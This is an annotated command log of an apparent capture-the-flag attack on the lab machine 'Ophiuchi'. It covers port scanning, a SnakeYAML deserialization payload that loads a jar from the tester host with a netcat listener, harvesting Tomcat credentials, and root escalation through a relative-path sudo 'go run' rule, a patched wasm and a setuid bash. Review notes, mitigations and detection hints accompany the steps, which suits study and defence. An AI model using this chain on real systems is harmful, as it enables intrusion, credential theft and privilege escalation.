# Phase 1 - service discovery against the lab target 10.129.152.152.
#
# NOTE(review): the first two scans share the -oA basename "ophiuchi", so the
# second run overwrites the .nmap/.gnmap/.xml files of the first. Use distinct
# basenames if both result sets are to be kept as evidence.
#
# All TCP ports with -A (OS detection, version detection, default scripts,
# traceroute) plus the "vuln" script category, capped at 15 s per script.
# --min-rate=10000 trades accuracy for speed: at that packet rate probes can be
# dropped and open ports missed, so the slower scan below is the one to trust.
nmap -A -p- -oA ophiuchi 10.129.152.152 --min-rate=10000 --script=vuln --script-timeout=15 -v
# All TCP ports with default scripts (-sC), version detection (-sV) and OS
# detection (-O), at nmap's default timing.
nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152
# All UDP ports with OS detection, written to a separate basename.
nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152
# Web checks aimed at port 80. The rest of this log works against port 8080;
# whether anything answered on port 80 is not recorded here.
# Detection: nikto sends a large burst of requests for known paths, which shows
# up in web access logs as a run of 404s from a single client.
nikto -h 10.129.152.152:80
# Fingerprint the web stack from response headers and page content.
whatweb http://10.129.152.152
# Phase 2 - the web application on port 8080 and its YAML parser.
#
# Not a command: the application URL, opened in a browser.
http://10.129.152.152:8080
# Fetch the public proof-of-concept repository for unsafe YAML deserialization
# in Java (presumably SnakeYAML, judging by the repository and the !! type tags
# in the document at the end of this phase), then list its files with paths
# and sizes.
git clone https://github.com/artsploit/yaml-payload
tree -fs
# Enumerate well-known paths on the port 8080 service; output saved to webScan.
nmap -p8080 10.129.152.152 --script http-enum -oN webScan
# Not a command: the Tomcat manager path, opened in a browser.
http://10.129.152.152:8080/manager
# Show the proof-of-concept class, then compile it and package src/ as a jar.
# NOTE(review): no edit of the .java file is recorded between cat and javac, so
# what the compiled class actually runs cannot be determined from this page.
cat src/artsploit/AwesomeScriptEngineFactory.java
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
# Tester host: serve the current directory over HTTP on port 80 and open a TCP
# listener on port 443. Binding ports below 1024 normally needs elevated
# privileges.
python3 -m http.server 80
nc -lvnp 443
# Not a command: the YAML document submitted to the application. Each !! tag
# names a Java class for the parser to instantiate; the chain builds a
# URLClassLoader over the remote jar and hands it to ScriptEngineManager, which
# loads the factory class packaged above. This works only when the application
# parses untrusted YAML with a constructor that accepts arbitrary types.
# Mitigation: parse with SnakeYAML's SafeConstructor (or an explicit type
# allow-list) and deny outbound HTTP from the application server.
# Detection: the Java process fetching a .jar from an unfamiliar host, or
# spawning a child process shortly after a request that carries "!!" type tags.
# NOTE(review): the tester address here is 10.10.14.20, while a later wget in
# this log uses 10.10.14.26 - presumably the VPN address changed between
# sessions; confirm.
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.20/yaml-payload.jar"] ]] ]
# Phase 3 - credentials stored on the target.
#
# Read Tomcat's user database. This file holds the manager accounts, and the
# password recorded below was evidently readable from it in clear text.
# Mitigation: store digested passwords (Tomcat supports this through a
# CredentialHandler) and keep conf/ readable only by the account that needs it.
cat /opt/tomcat/conf/tomcat-users.xml
# Not a command: a note of the username:password pair found in that file
# ("Credenciales" is Spanish for "credentials").
Credenciales-> admin:whythereisalimit
# Switch to the local "admin" account. Presumably the password from the Tomcat
# file is reused for this OS account - the log shows no other credential source.
# Mitigation: never share a password between application config and OS logins.
su admin
# List the sudo rules that apply to admin (output not recorded).
sudo -l
# Phase 4 - inspecting the program that admin may run through sudo.
#
# Work from /tmp, a directory every local user can write to.
cd /tmp
# Look at the directory and the Go source that the sudo invocation at the end
# of this phase runs.
ls -l /opt/wasm-functions
cat /opt/wasm-functions/index.go
# Put a copy of main.wasm and an empty deploy.sh in the current directory.
# NOTE(review): this only matters if index.go opens "main.wasm" and "deploy.sh"
# by relative name, so they resolve against the caller's working directory
# rather than /opt/wasm-functions. The contents of index.go are not shown on
# this page - confirm.
cp /opt/wasm-functions/main.wasm .
touch deploy.sh
# Record the mode bits of /bin/bash before the run, for later comparison.
ls -l /bin/bash
# Edit deploy.sh; what was written into it is not recorded here.
vim deploy.sh
# Run the Go program as root, from /tmp.
# Mitigation: privileged programs should reference their data files and helper
# scripts by absolute path, in root-owned directories that are not writable by
# others; a sudo rule for `go run` also compiles and executes source on every
# invocation, so a rule pointing at a prebuilt, root-owned binary is safer.
sudo /usr/bin/go run /opt/wasm-functions/index.go
# Phase 5 - building the WebAssembly Binary Toolkit (wabt) to read main.wasm.
# Working directories are not recorded in this log, so the relative paths
# below depend on where each command was actually run.
#
# Clone wabt with its submodules.
git clone --recursive https://github.com/WebAssembly/wabt
cd wabt
# Redundant after --recursive, but harmless.
git submodule update --init
mkdir build
# NOTE(review): no `cd build` is recorded between mkdir and `cmake ..`; as
# written, cmake would be pointed at the parent of wabt/. Presumably the cd
# was simply left out of the log.
cmake ..
cmake --build .
# On the target: serve the current directory over HTTP on port 8082 so that
# main.wasm can be copied off the box. Anyone who can reach that port can read
# every file in the served directory for as long as the server runs.
python3 -m http.server 8082
# On the tester host: download the module from the target.
wget http://10.129.152.152:8082/main.wasm
# Disassemble the binary module to WebAssembly text format - first to the
# terminal, then into main.wat - and read the result.
./wasm2wat ../../main.wasm
./wasm2wat ../../main.wasm > main.wat
cat main.wat
# NOTE(review): any edit made to main.wat before reassembly is not recorded.
# Remove the old binary and assemble main.wat back into main.wasm.
# NOTE(review): wat2wasm normally writes its own output file named after the
# input, so the stdout redirection may be unnecessary - confirm against the
# wabt version that was built.
rm main.wasm
./wat2wasm main.wat > main.wasm
# Phase 6 - placing the rebuilt module on the target and checking the result.
#
# Tester host: serve the directory holding the rebuilt main.wasm on port 80.
python3 -m http.server 80
# On the target.
# NOTE(review): `cd tmp` is a relative path, whereas the earlier step used
# `cd /tmp`; presumably /tmp was meant.
cd tmp
# NOTE(review): the tester address is 10.10.14.26 here but 10.10.14.20 in the
# YAML document earlier in this log; presumably the VPN address changed.
wget http://10.10.14.26/main.wasm
# A .wasm module is loaded by a runtime rather than executed by the kernel, so
# the execute bit is presumably not needed.
chmod +x main.wasm
# Check the mode bits of /bin/bash and the contents of deploy.sh (output not
# recorded on this page).
ls -l /bin/bash
cat deploy.sh
# NOTE(review): the `sudo /usr/bin/go run ...` run that would fall between
# these two checks is not recorded in this part of the log.
ls -l /bin/bash
# -p starts bash in privileged mode: it keeps the effective UID instead of
# resetting it to the real UID. That makes a difference only when /bin/bash
# itself carries the setuid bit.
# Detection: file-integrity monitoring on the mode bits of shells and other
# system binaries. Remediation: remove the bit with chmod u-s and fix the sudo
# rule that allowed the change.
bash -p